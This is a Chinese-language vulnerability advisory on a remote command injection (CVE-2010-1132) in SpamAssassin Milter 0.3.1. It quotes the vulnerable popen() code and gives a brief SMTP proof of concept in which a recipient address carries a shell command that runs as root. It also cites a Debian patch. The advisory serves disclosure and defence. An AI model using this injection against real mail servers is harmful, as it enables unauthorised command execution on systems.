安全研究
安全漏洞
SpamAssassin Milter插件mlfi_envrcpt()远程命令注入漏洞
发布日期:2010-03-07
更新日期:2010-03-09
受影响系统:
SpamAssassin Milter 0.3.1描述:
BUGTRAQ ID: 38578
CVE(CAN) ID: CVE-2010-1132
SpamAssassin是一款用于过滤垃圾邮件的解决方案。
Spamassassin所使用的Milter插件中的没有正确地过滤提交给mlfi_envrcpt()函数的输入参数。如果以expand标记(-x选项)运行spamass-milter,就会导致注入并执行恶意命令。以下是spamass-milter-0.3.1中的有漏洞代码段:
//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do address expansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r"); [1]
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
[1] 有漏洞的popen()调用
<*来源:Kingcope (kingcope@gmx.net)
链接:http://marc.info/?l=full-disclosure&m=126798948017998&q=p5
http://secunia.com/advisories/38840/
http://www.debian.org/security/2010/dsa-2021
http://www.debian.org/security/2010/dsa-2021
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-2021-1)以及相应补丁:
DSA-2021-1:New spamass-milter packages fix remote command
链接:http://www.debian.org/security/2010/dsa-2021
浏览次数:2694
严重程度:0(网友投票)
绿盟科技给您安全的保障